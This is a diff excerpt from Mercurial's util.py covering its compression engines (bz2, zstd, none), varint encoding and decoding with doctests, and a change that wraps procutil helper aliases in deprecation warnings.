3435 3435 yield z.flush()
3436 3436
3437 3437 def decompressorreader(self, fh):
3438 3438 def gen():
3439 3439 d = bz2.BZ2Decompressor()
3440 3440 for chunk in filechunkiter(fh):
3441 3441 yield d.decompress(chunk)
3442 3442
3443 3443 return chunkbuffer(gen())
3444 3444
3445 3445 compengines.register(_bz2engine())
3446 3446
3447 3447 class _truncatedbz2engine(compressionengine):
3448 3448 def name(self):
3449 3449 return 'bz2truncated'
3450 3450
3451 3451 def bundletype(self):
3452 3452 return None, '_truncatedBZ'
3453 3453
3454 3454 # We don't implement compressstream because it is hackily handled elsewhere.
3455 3455
3456 3456 def decompressorreader(self, fh):
3457 3457 def gen():
3458 3458 # The input stream doesn't have the 'BZ' header. So add it back.
3459 3459 d = bz2.BZ2Decompressor()
3460 3460 d.decompress('BZ')
3461 3461 for chunk in filechunkiter(fh):
3462 3462 yield d.decompress(chunk)
3463 3463
3464 3464 return chunkbuffer(gen())
3465 3465
3466 3466 compengines.register(_truncatedbz2engine())
3467 3467
3468 3468 class _noopengine(compressionengine):
3469 3469 def name(self):
3470 3470 return 'none'
3471 3471
3472 3472 def bundletype(self):
3473 3473 """No compression is performed.
3474 3474
3475 3475 Use this compression engine to explicitly disable compression.
3476 3476 """
3477 3477 return 'none', 'UN'
3478 3478
3479 3479 # Clients always support uncompressed payloads. Servers don't advertise
3480 3480 # them by default because, unless you are on a fast network, uncompressed
3481 3481 # payloads can easily saturate your network pipe.
3482 3482 def wireprotosupport(self):
3483 3483 return compewireprotosupport('none', 0, 10)
3484 3484
3485 3485 # We don't implement revlogheader because it is handled specially
3486 3486 # in the revlog class.
3487 3487
3488 3488 def compressstream(self, it, opts=None):
3489 3489 return it
3490 3490
3491 3491 def decompressorreader(self, fh):
3492 3492 return fh
3493 3493
3494 3494 class nooprevlogcompressor(object):
3495 3495 def compress(self, data):
3496 3496 return None
3497 3497
3498 3498 def revlogcompressor(self, opts=None):
3499 3499 return self.nooprevlogcompressor()
3500 3500
3501 3501 compengines.register(_noopengine())
3502 3502
3503 3503 class _zstdengine(compressionengine):
3504 3504 def name(self):
3505 3505 return 'zstd'
3506 3506
3507 3507 @propertycache
3508 3508 def _module(self):
3509 3509 # Not all installs have the zstd module available. So defer importing
3510 3510 # until first access.
3511 3511 try:
3512 3512 from . import zstd
3513 3513 # Force delayed import.
3514 3514 zstd.__version__
3515 3515 return zstd
3516 3516 except ImportError:
3517 3517 return None
3518 3518
3519 3519 def available(self):
3520 3520 return bool(self._module)
3521 3521
3522 3522 def bundletype(self):
3523 3523 """A modern compression algorithm that is fast and highly flexible.
3524 3524
3525 3525 Only supported by Mercurial 4.1 and newer clients.
3526 3526
3527 3527 With the default settings, zstd compression is both faster and yields
3528 3528 better compression than ``gzip``. It also frequently yields better
3529 3529 compression than ``bzip2`` while operating at much higher speeds.
3530 3530
3531 3531 If this engine is available and backwards compatibility is not a
3532 3532 concern, it is likely the best available engine.
3533 3533 """
3534 3534 return 'zstd', 'ZS'
3535 3535
3536 3536 def wireprotosupport(self):
3537 3537 return compewireprotosupport('zstd', 50, 50)
3538 3538
3539 3539 def revlogheader(self):
3540 3540 return '\x28'
3541 3541
3542 3542 def compressstream(self, it, opts=None):
3543 3543 opts = opts or {}
3544 3544 # zstd level 3 is almost always significantly faster than zlib
3545 3545 # while providing no worse compression. It strikes a good balance
3546 3546 # between speed and compression.
3547 3547 level = opts.get('level', 3)
3548 3548
3549 3549 zstd = self._module
3550 3550 z = zstd.ZstdCompressor(level=level).compressobj()
3551 3551 for chunk in it:
3552 3552 data = z.compress(chunk)
3553 3553 if data:
3554 3554 yield data
3555 3555
3556 3556 yield z.flush()
3557 3557
3558 3558 def decompressorreader(self, fh):
3559 3559 zstd = self._module
3560 3560 dctx = zstd.ZstdDecompressor()
3561 3561 return chunkbuffer(dctx.read_from(fh))
3562 3562
3563 3563 class zstdrevlogcompressor(object):
3564 3564 def __init__(self, zstd, level=3):
3565 3565 # Writing the content size adds a few bytes to the output. However,
3566 3566 # it allows decompression to be more efficient since we can
3567 3567 # pre-allocate a buffer to hold the result.
3568 3568 self._cctx = zstd.ZstdCompressor(level=level,
3569 3569 write_content_size=True)
3570 3570 self._dctx = zstd.ZstdDecompressor()
3571 3571 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3572 3572 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3573 3573
3574 3574 def compress(self, data):
3575 3575 insize = len(data)
3576 3576 # Caller handles empty input case.
3577 3577 assert insize > 0
3578 3578
3579 3579 if insize < 50:
3580 3580 return None
3581 3581
3582 3582 elif insize <= 1000000:
3583 3583 compressed = self._cctx.compress(data)
3584 3584 if len(compressed) < insize:
3585 3585 return compressed
3586 3586 return None
3587 3587 else:
3588 3588 z = self._cctx.compressobj()
3589 3589 chunks = []
3590 3590 pos = 0
3591 3591 while pos < insize:
3592 3592 pos2 = pos + self._compinsize
3593 3593 chunk = z.compress(data[pos:pos2])
3594 3594 if chunk:
3595 3595 chunks.append(chunk)
3596 3596 pos = pos2
3597 3597 chunks.append(z.flush())
3598 3598
3599 3599 if sum(map(len, chunks)) < insize:
3600 3600 return ''.join(chunks)
3601 3601 return None
3602 3602
3603 3603 def decompress(self, data):
3604 3604 insize = len(data)
3605 3605
3606 3606 try:
3607 3607 # This was measured to be faster than other streaming
3608 3608 # decompressors.
3609 3609 dobj = self._dctx.decompressobj()
3610 3610 chunks = []
3611 3611 pos = 0
3612 3612 while pos < insize:
3613 3613 pos2 = pos + self._decompinsize
3614 3614 chunk = dobj.decompress(data[pos:pos2])
3615 3615 if chunk:
3616 3616 chunks.append(chunk)
3617 3617 pos = pos2
3618 3618 # Frame should be exhausted, so no finish() API.
3619 3619
3620 3620 return ''.join(chunks)
3621 3621 except Exception as e:
3622 3622 raise error.RevlogError(_('revlog decompress error: %s') %
3623 3623 stringutil.forcebytestr(e))
3624 3624
3625 3625 def revlogcompressor(self, opts=None):
3626 3626 opts = opts or {}
3627 3627 return self.zstdrevlogcompressor(self._module,
3628 3628 level=opts.get('level', 3))
3629 3629
3630 3630 compengines.register(_zstdengine())
3631 3631
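# An illustrative use of the revlog compressor interface, assuming the zstd
# module is available in this install:
#
#   >>> c = compengines['zstd'].revlogcompressor()
#   >>> data = c.compress(b'x' * 1000)  # None when compression isn't a win
#   >>> c.decompress(data) == b'x' * 1000
#   True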
3632 3632 def bundlecompressiontopics():
3633 3633 """Obtains a list of available bundle compressions for use in help."""
3634 3634 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3635 3635 items = {}
3636 3636
3637 3637 # We need to format the docstring, so use a dummy object/type to hold it
3638 3638 # rather than mutating the original.
3639 3639 class docobject(object):
3640 3640 pass
3641 3641
3642 3642 for name in compengines:
3643 3643 engine = compengines[name]
3644 3644
3645 3645 if not engine.available():
3646 3646 continue
3647 3647
3648 3648 bt = engine.bundletype()
3649 3649 if not bt or not bt[0]:
3650 3650 continue
3651 3651
3652 3652 doc = pycompat.sysstr('``%s``\n %s') % (
3653 3653 bt[0], engine.bundletype.__doc__)
3654 3654
3655 3655 value = docobject()
3656 3656 value.__doc__ = doc
3657 3657 value._origdoc = engine.bundletype.__doc__
3658 3658 value._origfunc = engine.bundletype
3659 3659
3660 3660 items[bt[0]] = value
3661 3661
3662 3662 return items
3663 3663
3664 3664 i18nfunctions = bundlecompressiontopics().values()
3665 3665
3666 3666 # convenient shortcut
3667 3667 dst = debugstacktrace
3668 3668
3669 3669 def safename(f, tag, ctx, others=None):
3670 3670 """
3671 3671 Generate a name that is safe to rename f to in the given context.
3672 3672
3673 3673 f: filename to rename
3674 3674 tag: a string tag that will be included in the new name
3675 3675 ctx: a context, in which the new name must not exist
3676 3676 others: a set of other filenames that the new name must not be in
3677 3677
3678 3678 Returns a file name of the form oldname~tag[~number] which does not exist
3679 3679 in the provided context and is not in the set of other names.
3680 3680 """
3681 3681 if others is None:
3682 3682 others = set()
3683 3683
3684 3684 fn = '%s~%s' % (f, tag)
3685 3685 if fn not in ctx and fn not in others:
3686 3686 return fn
3687 3687 for n in itertools.count(1):
3688 3688 fn = '%s~%s~%s' % (f, tag, n)
3689 3689 if fn not in ctx and fn not in others:
3690 3690 return fn
3691 3691
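# Illustration (any container supporting ``in`` stands in for ctx here, as a
# real context does):
#
#   >>> safename(b'foo', b'orig', set(), others={b'foo~orig'})
#   'foo~orig~1'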
3692 3692 def readexactly(stream, n):
3693 3693 '''read n bytes from stream.read and abort if fewer were available'''
3694 3694 s = stream.read(n)
3695 3695 if len(s) < n:
3696 3696 raise error.Abort(_("stream ended unexpectedly"
3697 3697 " (got %d bytes, expected %d)")
3698 3698 % (len(s), n))
3699 3699 return s
3700 3700
3701 3701 def uvarintencode(value):
3702 3702 """Encode an unsigned integer value to a varint.
3703 3703
3704 3704 A varint is a variable length integer of 1 or more bytes. Each byte
3705 3705 except the last has the most significant bit set. The lower 7 bits of
3706 3706 each byte store successive 7-bit groups of the value, least significant
3707 3707 group first.
3708 3708
3709 3709 >>> uvarintencode(0)
3710 3710 '\\x00'
3711 3711 >>> uvarintencode(1)
3712 3712 '\\x01'
3713 3713 >>> uvarintencode(127)
3714 3714 '\\x7f'
3715 3715 >>> uvarintencode(1337)
3716 3716 '\\xb9\\n'
3717 3717 >>> uvarintencode(65536)
3718 3718 '\\x80\\x80\\x04'
3719 3719 >>> uvarintencode(-1)
3720 3720 Traceback (most recent call last):
3721 3721 ...
3722 3722 ProgrammingError: negative value for uvarint: -1
3723 3723 """
3724 3724 if value < 0:
3725 3725 raise error.ProgrammingError('negative value for uvarint: %d'
3726 3726 % value)
3727 3727 bits = value & 0x7f
3728 3728 value >>= 7
3729 3729 bytes = []
3730 3730 while value:
3731 3731 bytes.append(pycompat.bytechr(0x80 | bits))
3732 3732 bits = value & 0x7f
3733 3733 value >>= 7
3734 3734 bytes.append(pycompat.bytechr(bits))
3735 3735
3736 3736 return ''.join(bytes)
3737 3737
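# Worked example for the 1337 doctest above: 1337 is 0b10100111001. The low
# 7 bits are 0111001 (0x39); with the continuation bit set, that byte becomes
# 0xb9. The remaining bits are 0001010 (0x0a, i.e. '\n'), emitted last with
# no continuation bit, giving '\xb9\n'.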
3738 3738 def uvarintdecodestream(fh):
3739 3739 """Decode an unsigned variable length integer from a stream.
3740 3740
3741 3741 The passed argument is anything that has a ``.read(N)`` method.
3742 3742
3743 3743 >>> try:
3744 3744 ... from StringIO import StringIO as BytesIO
3745 3745 ... except ImportError:
3746 3746 ... from io import BytesIO
3747 3747 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3748 3748 0
3749 3749 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3750 3750 1
3751 3751 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3752 3752 127
3753 3753 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3754 3754 1337
3755 3755 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3756 3756 65536
3757 3757 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3758 3758 Traceback (most recent call last):
3759 3759 ...
3760 3760 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3761 3761 """
3762 3762 result = 0
3763 3763 shift = 0
3764 3764 while True:
3765 3765 byte = ord(readexactly(fh, 1))
3766 3766 result |= ((byte & 0x7f) << shift)
3767 3767 if not (byte & 0x80):
3768 3768 return result
3769 3769 shift += 7
3770 3770
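# Worked example for the '\xb9\n' doctest above: 0xb9 has its high bit set,
# so its low 7 bits (0x39 = 57) are accumulated and reading continues; 0x0a
# has the high bit clear and contributes 10 << 7 = 1280, so the result is
# 57 + 1280 = 1337.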
3771 3771 ###
3772 3772 # Deprecation warnings for util.py splitting
3773 3773 ###
3774 3774
3775 def _deprecatedfunc(func, version):
3775 def _deprecatedfunc(func, version, modname=None):
3776 3776 def wrapped(*args, **kwargs):
3777 3777 fn = pycompat.sysbytes(func.__name__)
3778 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3778 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 3780 nouideprecwarn(msg, version)
3781 3781 return func(*args, **kwargs)
3782 3782 wrapped.__name__ = func.__name__
3783 3783 return wrapped
3784 3784
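# For example, calling the deprecated ``util.makedate`` alias defined below
# emits, via nouideprecwarn, a warning along the lines of:
#
#   'util.makedate' is deprecated, use 'utils.dateutil.makedate'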
3785 3785 defaultdateformats = dateutil.defaultdateformats
3786 3786 extendeddateformats = dateutil.extendeddateformats
3787 3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794 3794
3795 3795 stderr = procutil.stderr
3796 3796 stdin = procutil.stdin
3797 3797 stdout = procutil.stdout
3798 explainexit = procutil.explainexit
3799 findexe = procutil.findexe
3800 getuser = procutil.getuser
3801 getpid = procutil.getpid
3802 hidewindow = procutil.hidewindow
3803 popen = procutil.popen
3804 quotecommand = procutil.quotecommand
3805 readpipe = procutil.readpipe
3806 setbinary = procutil.setbinary
3807 setsignalhandler = procutil.setsignalhandler
3808 shellquote = procutil.shellquote
3809 shellsplit = procutil.shellsplit
3810 spawndetached = procutil.spawndetached
3811 sshargs = procutil.sshargs
3812 testpid = procutil.testpid
3798 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 modname='utils.procutil')
3800 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 modname='utils.procutil')
3805 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 modname='utils.procutil')
3808 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 modname='utils.procutil')
3812 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 modname='utils.procutil')
3814 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 modname='utils.procutil')
3816 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 modname='utils.procutil')
3818 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3813 3820 try:
3814 setprocname = procutil.setprocname
3821 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 modname='utils.procutil')
3815 3823 except AttributeError:
3816 3824 pass
3817 3825 try:
3818 unblocksignal = procutil.unblocksignal
3826 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 modname='utils.procutil')
3819 3828 except AttributeError:
3820 3829 pass
3821 3830 closefds = procutil.closefds
3822 isatty = procutil.isatty
3823 popen2 = procutil.popen2
3824 popen3 = procutil.popen3
3825 popen4 = procutil.popen4
3826 pipefilter = procutil.pipefilter
3827 tempfilter = procutil.tempfilter
3828 filter = procutil.filter
3829 mainfrozen = procutil.mainfrozen
3830 hgexecutable = procutil.hgexecutable
3831 isstdin = procutil.isstdin
3832 isstdout = procutil.isstdout
3833 shellenviron = procutil.shellenviron
3834 system = procutil.system
3835 gui = procutil.gui
3836 hgcmd = procutil.hgcmd
3837 rundetached = procutil.rundetached
3831 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3832 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3833 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3834 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3835 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3836 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3837 filter = _deprecatedfunc(procutil.filter, '4.6')
3838 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3839 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3840 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3841 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3842 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3843 system = _deprecatedfunc(procutil.system, '4.6')
3844 gui = _deprecatedfunc(procutil.gui, '4.6')
3845 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3846 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3838 3847
3839 3848 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3840 3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3841 3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3842 3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3843 3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3844 3853 email = _deprecatedfunc(stringutil.email, '4.6')
3845 3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3846 3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3847 3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3848 3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3849 3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3850 3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3851 3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')